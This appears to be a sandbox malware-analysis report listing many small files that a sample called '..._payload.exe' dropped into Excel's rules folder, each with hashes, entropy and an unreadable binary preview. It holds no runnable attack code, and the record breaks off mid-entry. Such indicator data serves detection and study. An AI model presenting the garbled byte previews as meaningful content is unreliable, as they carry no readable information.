                                                                                                      Preview:<?xml....bA...{...E.......d.....-%..S...8.Y....YW.@.C".Q..t.h...#0J..5A.J.ky..b.4....Z..O.m......:..Q....K.@...w.0.8.`u.p].i.Wm..f6.`-.....h.,..$GD.TG.:7. ..uc..&.9..Id7......CWd.S..n\.fX....K...B..e}I.......Ga....&..;b.]-.46.U..A....z)..1.m.N....#.BG~R...f..e9.,........z..b;.`w.-Q....G...1. .....B0..W...*...x}3K.m.8...AE.WL."...gD..H}.@.;.g..H]j.O..,#Ag4t'...[...d.}).....`%.x.t.....$.(...).6_j....V..,...V...n.....oW...q..`..W)....6 ..u.a1..j.T|...a........... ..Ft..P..J.1Y.i....1.m...GX ... .?...H........./o.......A..t.f..2.......STk.A.:.7..,z.....jEw..Zwb.eM...8f...%xP....e7M?.P..N....s.E....R..K...N..S.b.%M..PD6...Bd...O....=.6N..n........Z..H......$....h^.3..S9..=.J...P..o.`..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120613v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):965
                                                                                                      Entropy (8bit):7.79842279813186
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:YjlILYjkAaAJkjB4BWUVkzMiW/Kk7dfuVxjv6bD:YjlIsYo5WEkzMbRd2VxjwD
                                                                                                      MD5:2754866034426E3BC5D61EA24DFCD41E
                                                                                                      SHA1:6185A607B3D616E07CDAB0EA9951DDEC3E37BA82
                                                                                                      SHA-256:D7D9639ACBFFC78D886DD1FE26CE5F7C960C27544661E8B005DA7458862AD68B
                                                                                                      SHA-512:90267866805F15A5306464A2956283E62BCC28C3034A4793499C3D4C5EA876E78D412EBF0CE8BC14945C0A23D790F40210E103F31D090457CBA08C7168222B19
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.om..T.(.....3.!.g....t..U...7...?...W.7.......P} .ih.....3.,.Q....PP.wWE.....V6..[...[.]...X....{.U.._vS.........T...]/... ..Et.1..q,..F.n..0A.H.V..^y3.......x.LI."p4...p;.*...A.... e..].x.m..E.J...\..........-G...`8..,..._@.s.aq..E...BO.vCG.....%H...G.xQ.#8...R..K.y.atj.+n=c....#.CL.;.oH.,"rX....h....=....K.(J.;.m:.Z...Ec..}..sl....+.s..1...8j .d.fNsH.J.....{..N....n..}...m.K......H......0r5.........s.I.U.r'....$>9.h-.>`<...2}d...}.Z...V....8~],..u."..K..w..P.~^...{.[.W.f.!k.Q6.3NA..#......BX.l.#..(...*R2K'~.Z..N..iY.nB.U.e}._...6....S=1eX..\..-0m...L0e".........9....i. .PC..4q.p.G$.DooT...O.kb.?..`.<.<'!.........dR..HTZ.1..p".]C.:........mq.^.......:Z...BW..(...+.6.O....m..*..>..D.Zs....OneGU,p...\.>0B.A..e.......*..?.....I...N.z.L...:.B.">.w.......Y+~.7..Y.q.\7...&..>... .4.8...vih.N..~......d..C.A..M..>I....7..1hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120614v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):800
                                                                                                      Entropy (8bit):7.720174812601065
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:1Zo6fdp8Ia7qfbtVoo/vkQptzD0nPopKtnv6bD:1Zo6f8ZqfzooD0nPRtnwD
                                                                                                      MD5:C317A10C127432766C70B65C533B88E4
                                                                                                      SHA1:BB92CDCCBE29E396E22631ECED221EBC058A5442
                                                                                                      SHA-256:07E156A94BF1094CF59BEB6DDF48FFD1D24D2E1B854674FDD0CE94A7DB9B07AF
                                                                                                      SHA-512:56F6F15C596A15743E81DCD48257ED4B8386227D7B2390050BB2314090FB047254389643711AC0582A28D980711B9D71846C4181B2E6613E4656B620099DAF83
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.].`W.`i..+j.'l..'..e.d.Q.t..&..8..i..=L.%.k.y..0....9:E9).k.T..n.9....9.K.!s.=E4.*nI..zF...%6..\...2P...z!O].H,7.+X6...6..%....L3..HUE..9^.p....T. ....}.@..Y...?K.N.?...`......=...gT...N...q..;.F..\..3K..+.t.}....31..=......[v..v....U.'..-.2.H.k....4*.R..L.&.}..]..7,9e.y{.@`..........^..A..C.._t..Q]#G..Y}!Qx..&....+.Z......9P.i....)@J.~.z......".Je.........Q..l.i4.BE."..t>..}T..@&r..(..P..d...&;.....K.......r.(.bX..$R#....mgUC...Ao...;.qj.......&......[..............$<..O.....h...^.P.At+P.*..?u@.."..`}......#c.J....8P.......9..zXL..`E..?...uk.&v......?.U.T..j.;.!.V.D..;..l..'.0....%v.'. .c)*.;1gv.>..'X..+...r.9..[.Wx..E.a.....H.W.........U.1..C.%.1.yN...p..O......:.U..%7.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120615v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):740
                                                                                                      Entropy (8bit):7.751442523252007
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:eNEidMpHYSkWuHCAlx5V4NM6w/S03GecLvrt8+Yr9a2MuVu+Lv6cii9a:eNXdMpH1FuHV8M6wa0WFLvrG+QI/uV3A
                                                                                                      MD5:82358D6B6ECAC01E2FC43E895240D05E
                                                                                                      SHA1:D21682EDF1A13066CF6FD001B48B5778D636A262
                                                                                                      SHA-256:9805E1262DB825EA57DB8ACC4FFE99CB962A810D02E9DF27CE4E04EB8981D65B
                                                                                                      SHA-512:C6D5F7059D2CC0DACD4E309CAF5451F038B1653E426A54D402B26360591DBA37D65BAC8B29F24AC4EB447129D3F524D0E0950CF167148AECA8362006D6276D79
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..c....<Y#.w...!/wc..ry...o.s..gL.!.}..P.L...<3.\......=R.....<.x.I....:qDj.b=b.s?......ry+lrS.j....N....l...../x.B.az.k..=D...v....v6....ozfW.:..<...Cq.....%..O..&.S.xK.(........r..k....R._.H.-%.....Q........g*.J8..1.......2[....p....0..M.'....%L.n.-J...NN{sH....1....g.}....}.T........gj..Z.w.mw T.DS..v......f..f#.[.z.5%...N.!K..SP.L.Km'.`]....[.4knM..<Hw...U._.s.$.....[....>..ey)...U.... ..Ke............`....j'=Z.P.,+.:..:.+*......d..o...2..Y.*..!.... ..=...-I...S.4H..{...YH.z*..E%....j........aQ......L...._....5..LR..q.a0L..A..GJ.h.g.Qz\..zC.."ZK......w(T.]\.PU;..x........X....P..j.u.).]{V..A o..++^....S.m.h...3/.1* .eO.f.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120616v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):819
                                                                                                      Entropy (8bit):7.806305929955974
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:JW+Yen2moA+vid7obTjeQU4Ld+Zbt+2QQv6bD:NlDoJvo7YewxVQwD
                                                                                                      MD5:B902F64C73810DEF92A5CFC815AFC8FC
                                                                                                      SHA1:5FDB4A6DB360B12765C2AAEBBFD607DD76746EEF
                                                                                                      SHA-256:DB7B788072CEB59AE5DF04A382E3D6F6FF1F73AB9431A36C16B05F4A6D70CAD4
                                                                                                      SHA-512:5011DC672F02A22BC207A8D44190F9B55869E0808A1A7EA435ECD75745013982B8DFC9F2E046AB5A6F43671997726F437A94F1F9A0E8D1B8F3DB41D7B04A6EDF
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml|..CL.i7.^Ji.x...o.Vc...e...^....@../.)Z..I...$.8.....\..h.....[.^I.6...AQ.L_.tM...D.S.0.1..9..C....)..hq.....;..1...Xj...Zbu......E.....?......V(.....g.......bD...G.m..../}...Td..3.....z....<..C.<..Td$/_......"...~.{....^.-s...x.+.s.....8..ro...BQ..*....fv..j...;.@.H...k.$....*-\..Y7..oC..=%..[...8~...#.+Q_..?.?.....f3.2S..MY..S"..k.v[... .:u.#.#,*V.-....l......P.`he.....N{.y..S..[.%....w...."...c.l%w...n5..(......?...!..#..zf.+......N..p.n...pB.........3.a.n....eWH.......p..'...WE...]%.0.Z ....3..f-.".//.^.~....S.5..%:'.q.Q#.....Ri&.0.@.8s.|...a..6.......J...m......T.F....m<...(....m..p..._c...3..U....U]!.8#.f.&i.......!....*.B.....g..ura.%u....Z...'...2...R<.....;..NN}.|j...^..L..@.vEhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120617v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):760
                                                                                                      Entropy (8bit):7.67071802896428
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:oeRP+wHhXV1jMmuLQZ2X+GfY0lvp3uaG3YVIyDVCjsqLJyid8MhTUHTTEWv6ciik:5RWyhF1p9O9Y0/VPVIyQjO+PhGTEWv6X
                                                                                                      MD5:22CE6F62692E27681B8A5615EE8E980B
                                                                                                      SHA1:CB779E6CD384B48D6DF5A612325C02F5DFC91CC2
                                                                                                      SHA-256:3CB80D624601FBFEE2677F9FF76BA598669BECA5A1D97D059F85FBDDE7D746B0
                                                                                                      SHA-512:1027EF0CC38DD9D934EB9F89CDC63AA6FFA131CCD1EFC91F4DF1C27E51B7C21408B4063A318098C94DBE5BA20A9A434452B80661D390AC8E0E576E83199A6B76
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlV..0.....?...k.$.......;....].<..YY..........._ii....(.c.......|..T=..YM....U...e].P..f...h....8.7.b.U.AKY.nJ...$.w....@)}R."...).v.*Yl..cm.Ww.n.7.hG.ARQ.q.96..t.D.V.e....k.7...Q.',*~P.c0.c..... g...3..!...X..T6...sK.x...@).N.=-..hiu.g....F....H"..x|.....R...b..z....M..I.F..........i.Z.._ o.^-..{6...._..8...~6...kb...J...C.Q.<D..W.$.1..wz"Fy...........w(`|[.-...w N.\..cXh.s..5..v.....Px.....9h....@./i._..L..1+.....*........_..Y..*N....x...J6yT.#y.@l>.......9).P.|.4V.(.nE...Q.3R..........m.}S....b....k"a..P...M%....d..L.}..#ge.j......E4...'...,M..t..m...r...UR.&q....%...k..H5.Y.N..J#.Y+....'9..a.6-..G..nh^j.C..L..W~4....+..$w.....x...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120618v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):819
                                                                                                      Entropy (8bit):7.745246019322519
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:43dpDJC4IuXYgDK5Sk1X4u1GN3cKwukV1jETAKIB4Y9dv6cii9a:43dJtIuXYgDAeu189wuIn9Tv6bD
                                                                                                      MD5:E5F93CED98D1DE629CEF6856C149DD5B
                                                                                                      SHA1:E9788F62FBAF16B40DD19EB34915C4FD556A5029
                                                                                                      SHA-256:8FAA1AC820837E5220B5561A49B8EBCB3E4FA17DF03708D7E0774098F3C0C0A9
                                                                                                      SHA-512:9968023DCB24FC03DCD2E773C3A12C028A62CDD5F01085E4B2A271689EEB4564B1DCC930B29213974C0BFC406AD97C526458609F9F311AB2EA9524AF9C9B2591
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml`.....xw....?.i..b......W.K..=...+..*.B.....8.O...G...|.[N.|_!.Orwh....K..nTd..........=yx.F........A.K)8...R..D....#....K.$G..*B....-....U.r\B..Q.dN.g.S9.4At.d...z....T.y..p0.3...lx,..O.._2N8?.H'~.R.QR,y.....V.?@.........nm...>y2;....~..rF..K....!o..Pq........$ f.x.....{o.U.........f.............9.......#......t`.......nry...........F#.|..mwAs.jm..+i..&g0.\..:^&1.Q..0...7v.u...s5.TR..QEL..ZV..Kz;..J>..@.0...Y&........r..]..w.|~^#n3H@y.C.<.J..C .....L.z.V.{4@.......PW..&.:)}c...BW.....1Z......4}.;.K....c0.;...>e..|........&h......81\\&6KX..`G$...Y..p.kml}P.+DwcX.g.8.f..Z..[O.m.PJ.d..@e.2..p%9...d.o+.i.Bt.!Ic.y...b..B......,].N:u{....3......|.s!.cW..M.......B.....<..:..5...Y$j..r......l.S..7b...{)hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120619v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):740
                                                                                                      Entropy (8bit):7.725557517350375
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:sCEnXqiBfn6nptGv8DVGDpp+vQZ39g/JH+2sht3jc5ZMKMiSqv6cii9a:Mna8kPVwdpRp2x+niZMKEqv6bD
                                                                                                      MD5:716AD55440F2085DA9AEAECFEE3BD526
                                                                                                      SHA1:06C5A05524F4E2B0D0DEDAFEA8FC16D69402CA1C
                                                                                                      SHA-256:C7626654BBAC03F70A6ADFFC89092333DBC225A1D1BE1DD32CA5025412CD339E
                                                                                                      SHA-512:312036E3C6B65DB232B43595CA277A93C169C21B4B45250A41AB1EF64DBC97E3105D815A10D651C32F2F108420A0227672E02BD51467AADCBE8085A11EE89B12
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..1<...=.R..:.M.A..).*.2....)..... ._0..`tKS.j....9.....t.K.1A[.s..N.S.P..W....}eM...:.{z..4..n.....f....6.w..s..P.O...y'.c......6.7...c.t/U..e|#.p.Z.f....H.k..?.r....m6.........l.............w..-..J....fW..R7...GE....e.ef.f...^.....W.:.. qv+.#.&.j....`0....6x.Y..a7L..T9..6..gg.Y.V..b.B3.....zQ.......PZ......S.... .......x&.&.v....x.I..l...o>./n@...TQ......N#.I....7.?.&D.!..N!UK.l0WMJ.0.TK.b.....TPn....../9..M.<.......\...b)..c.8y(M.w..a..5..73...Z..J;70....7$..S.h..(..?....t....6.;..~...S.v....VJt.L.~..D.w.hY`@0f..~=..p_..e.7%...,....P.a.q.9.&.....I.0.6..*tUv..P....H..........i.#..[...q%....v...'...F.WB.(.....0.=hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120620v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):802
                                                                                                      Entropy (8bit):7.719312275978352
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:WIYgjKI12zuKxEfswxfbguRGXEwH6Eci9FG0TrPHn80ruxKMfdhsv6cii9a:WIYguI4uRfRxxGJcsPTrPHNKpTsv6bD
                                                                                                      MD5:DAB7233BDCDBFA499E13CFC938B9C9DB
                                                                                                      SHA1:A8C4C9E5BB1ABE23B02347633D99BCE2C148CF9A
                                                                                                      SHA-256:FDB35644C2A51A35789F929FE33C1C55491D1223C0C655B6FF87A36632A82EEA
                                                                                                      SHA-512:65D9970F24A77CCA03424E54C89C9BBA719744FD6ACE4AF0E4987954E2079F5C043B023A3ED2DC7C02377E51DFC4BA3EEBA558226D91506E5DC11A5665CF7CC5
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml."...*..*.V....GCU..N...$E.#..4..K...G.'M...N7._../VZ.ca.....3.....S.}...HS_../.{.L..A...D....A..).b.....'.L..6;.?....Fom.C.z.b.]44.;.K.g..!m....G......)..j.k@.B...6.mlBeV.z.~..4p.p>_.z.F.s.?..... Y).......353... .Oh....*.....`.A..Q..9,..b.7"..V.P...M..........xJM....z.M,......#...e%..vP..0.m.U..}]...l.....xw......g...U...P.."-.aR...W..Y;.;...;...>..cX.......^.t..6bZ.....#...+......,..uYV.ghikT.TD..D.L..;..xC-..O.g..,rW.....S...<5Y..T..C....y.}....W......w..8v......C.HK.A...O@.......9...K..........2.*.$[M..=...Oij../_..s.H...{4.p..MN.[.'.b.....f..)..fcA..Y...J...Nf-6M..._...M..a..f.9'I....S).L.o ....k..{...:RC..3.Q.2Vi.!..h..I..._....&.(..Ur.&*).A.a...S7.z..{....c&o...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120621v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):748
                                                                                                      Entropy (8bit):7.693158351521403
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:AkjzPKsdbBvTIUWz5weqjWP3fhriIfhpfFb7rH2UsxJJsczAolTdFDwv6cii9a:AkjzPbRRWzvqjW1hpfFT23Jh3jwv6bD
                                                                                                      MD5:FEA0C4F037857B4B164A72C3807C34B1
                                                                                                      SHA1:835256128436EA4E4FBF8F730727A7D0BB979AF8
                                                                                                      SHA-256:19170BE0F81885893F23C5DCC149FE794AD7194E76422573732ED387EAA3ED86
                                                                                                      SHA-512:C1A3108D68EB2581F15375CDE02885BA5FAF658FD7979E210682E4B360FE1FFC5A88BC019EBA95F7E96D3EF80C97FCC7A142A198EC7E5EAAFCA13C436A3F49C7
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml}XUs.H4..&.[...X.a.}.n|...vl..Hx.Z.....vlJ+......t.`..XH0._h....9.....;Y...GV<~ *?.FC.R>._...&....J..~i...#.6.>...c....%.]...c.8........c?.LO....VUR.......}..3nC.D.....1v_...{.:..-.LFr&.. ....:.V..ts`.[1w...:~}!o..%Q,.S8.:..qi....a...St.[...[CHD......"p.f@k...T..*4.y.\...."3.......c.B....b...+.6..h..Mc...]K..l.........L.r..../.P.[.A4.<B ./.Zp..?w..X@|\.../.Fz]y.+....p........B..(.y..C..._...r..:k<N.....w....>...J....Rv....?;.}ad.=.7o.N.L...b./......:.7..>..j..a\d....9..%...-.oR.......y1.7...p.~.^..{..&.f.^z.rq.....#8.....8{x3....OF{..."..R......L.5}.F.N....C.<.. ..qf.fh....._.k.".Y..[.4`....1.[nH....8...GG{J.b.../..x.....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120622v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):810
                                                                                                      Entropy (8bit):7.731480328051541
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:gSfxnMeTNh8BuerCCQbNvt+lM2c+gjkpxIxfwv6bD:NTLwukyx+gkpx0wwD
                                                                                                      MD5:7FD9343D75D7AD6422C0460B8E6EA9B4
                                                                                                      SHA1:185531368792899DE5064A297517C3DCDCCD9DA7
                                                                                                      SHA-256:29B6F4A963AC819A59B73DD53AA00F3F7B9834A1E1016DF985C86120B84034CE
                                                                                                      SHA-512:DF1EBE22B4CF56C22381FF54CF8F92A3FED15FCB6582DC11A52D21B8D2479EE5019D540734D8D83F03EAA6D90F058726483E8A62090373514DA4F0AAE1474595
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.Q..y.y6!.U5.b...Df..#........*...]..?......i.z......D.......a.:...........L..d."..<.>.9Dr.....0..y~..J[...n...5..n....F.mW|...L.@.n.n..........`d@....?v.P.b.,N..+.+...!...D...%.c.........]...D.7@.t.T...L7........3.....9T".\.=.m..p.<.Ve.I..ns!.h...^u.}....tU.a?|5.<...:...0"...Efnf.`.P....|.....t.z..L.......V..t+s...>....U`R.%.{.n...A.[.u~F|g.......My.....W=..$...g.[.=2........Mm.<....=B)IK.i..\?........j).1.D.y..CE.].r.q..J...}.D..oI.Jz.}....5C.*i......}.p.D.t. ...'...7p.m...8.N.X..x.....|..TVk.r.x.......$2..D/eng....A.G.sW.jM.}....x...{fa....l=..d..0....e....<....o9H....4...2$..Q..(....P..Y...|r.....!{)r...7P~..a.r..%o..y.....&..R.{..-...81...{....om....2.^..xuJ.|.....8..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120623v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):797
                                                                                                      Entropy (8bit):7.714343403932942
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:pMbW1E3x4RiWme6vh6c5ogQW2lykaOivv6bD:SbWuKILtpQWgykaOivwD
                                                                                                      MD5:E3CFD6E927A82020DC3AF651EB10510F
                                                                                                      SHA1:ECAD4BA3FADF4C54EE7BB36513394EBC67B136D5
                                                                                                      SHA-256:50D29FFDCBF6545611C4B381BC92639030CC44C7F20DC45955552D37FBE8624D
                                                                                                      SHA-512:E815F61CD8A0F6E60196B250BCEC7D01ABF3DD710FC93B752439FB0B62F23372FFF5DB91C5766F2222EA7670E111A31B31EC403B710A46E6CD1C56C5B5BDC54F
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml".fKJ..P..n......[v.r%].o..u.xn7.....{9d.Y..R0..K...i..I).R........+..".?j../.........@.R.]eb.{l.&......).....@m_..g:e...[oC9./..^..-IPT(.o2M..<.=/..s.\..Va.w#.......s=...C..U.S"U.w..]...,...s3.._&.0aA...'].Fw.5.NJ.....iI.....cH$p...?B.M.h. ....[).K.....U.D...Rx..M7s..H......c..d......RB-n] h1:r.].2.....v.Sw..p..`zUr.G"0.b.......Oq6.u..-........ooz\?x.&@\.......M....E~]-.%.O.R.w.cB..}....,,.Z.i..x;k0.Q..1>.{*.v.n.B.[..`....G.~..DV1.o\.G.....!4.C*......A.oa..)......4G....p........%d@.C.......-.7..Z.AM..]+..p..B..U%o ..hy......&..=....)!...e_..z..C.x.).O...;X.H.M(..1.rVmO].x......#.Qr.+W.Z..........b.f[.Q$=.... ...).L.V.1P...].Q.. .S..-.$.......^..eR.%.}.6r...U.....q,..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120624v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):827
                                                                                                      Entropy (8bit):7.757725703965636
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:hHRTqva5V00EjFfvhrjLdiCpPpqRYpbdz21v6bD:hHRWvaTt+xhrvd/qRCbdz21wD
                                                                                                      MD5:8F844F5060C5BE9A7527C2AFE62338E7
                                                                                                      SHA1:5478B60C23EDD62E79AB0713453C414C93FECEFB
                                                                                                      SHA-256:E028E1B69EBFB3C5EAA8003443B711920DDE45718239C83CF3E3984FF26780B1
                                                                                                      SHA-512:2E19A3DA37358B31DE8A97C95B3F948584FB0A24005DAD204DE6345CEC3AB0C73347561BD91FE6941E96E129742F324D22DF0BD8E93A5D56D66E2006B266D613
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...>..s....To...Ml...6j.?..G.S.....rL*.....N..s....]O....>.... ._..@......9..h.....G.'r.YU.........@m...U3.-. .....r$o...6.d.[PK.[m....#.j/..`..%7.:nw....D'.....$.$..`~......i.........+Q.fd..z...I..9...x.Y0.....~^v...Ia.....w@....}......[..6.{5+.K?/.*.d..!.....(.TCa..Ci...V./.kI.3.._.....L;.@@..........n.<..Mv.x......J@[..;......TU.......\P.y)n.......[...}.._....y4$...c.,....Ny.r..S............0..Y..}..b.<R..i........Z&..p-m...N......|...jO..."....X.'se........".E?&=._..>..Ic..0..}.7.f..K.........?......kr..c~./.t.Q..........$...J^S....q...'...~..E..G...9...VO..gqgP....3L.......n...E`D.?c......T$F.._o.~uD....q&.V7.l..o.e..@.M.6 .T-...Wi.}.|.Ds..%.K.:../..z.7.h.e.."~...[>|.......z3.,......0..$.E67..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120625v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):752
                                                                                                      Entropy (8bit):7.7193536536226395
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:WMOt87T6G93StvlmoffxB4u2vwpA427cuQGPOPUJwJrnwUwYnuSbJE92Aq8Rnv6X:Sg6G93SxljB4u2vM527cux2PgwdnwUwG
                                                                                                      MD5:09A7B58A0E6FE124454678954E862224
                                                                                                      SHA1:EC0938CBFB4AB851F762244CC992D705ABA5F342
                                                                                                      SHA-256:AFE919E639FF33EF8E09D309BDA67AAD3A63A807AA673F4E7375650AC23C79B4
                                                                                                      SHA-512:5B1A06162D9C88BB95D8CF2CCF2D6BF1FF7E049B77401AF3E23A1339A87701F54EDF217B1BECF273C8B1BAA5956FDE935F95667F3B9DA11C62DA235F6650607D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.c.*...V.b.....4.q...b..'...e...Q..Y.t4.P5eT.F.Z<[w.xZ.2..."......7....<.}^...9.C.. .U.h.MJEf..D.*#<....!.n....+@".....Qna..Q`.S9W._s.....N.....t..&k...P._.T...@...M%...&...x.A`...G ..I..~(...wD..m..9bm@3.....IW.Xe.A......M..R.......V.Y..M...|^...4.o.?=....>"..K....z:..z-.T....7C...w.ssS.=J4l.....%Kk.9..+.)..`m(}M.'[F.rt.~g........>...B..%.....SC...d.............../..tRs.`. {..Z..W\.....;..c(............J.+:`...5b...8;.F=&.'..(..lU..aEJ..G...X..$8.s.R._b.d.B....j...Q.%.....5.~.b..[n...X......M..s...z+.4..r..*Q.....M...&..NNO.ge...:K5]&v.b5L.Zz)xK=.`<...y-.......\..Zu*{.....|@5.......M......Y0.f7g.P...6..pv.#..>Y4w...;Rc..?BhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120626v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):805
                                                                                                      Entropy (8bit):7.7552909215545345
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:wd4M1KK/yZDl+3r/x5LXMi0r30N7TvPWBIk2Vzv6bD:w1KK6JlY/x1Mi6G7TvIywD
                                                                                                      MD5:D433CC71C2F71D12AEFE41C166B85C36
                                                                                                      SHA1:46BC9F5A556E7FEE43511334A783AD510DE33EDF
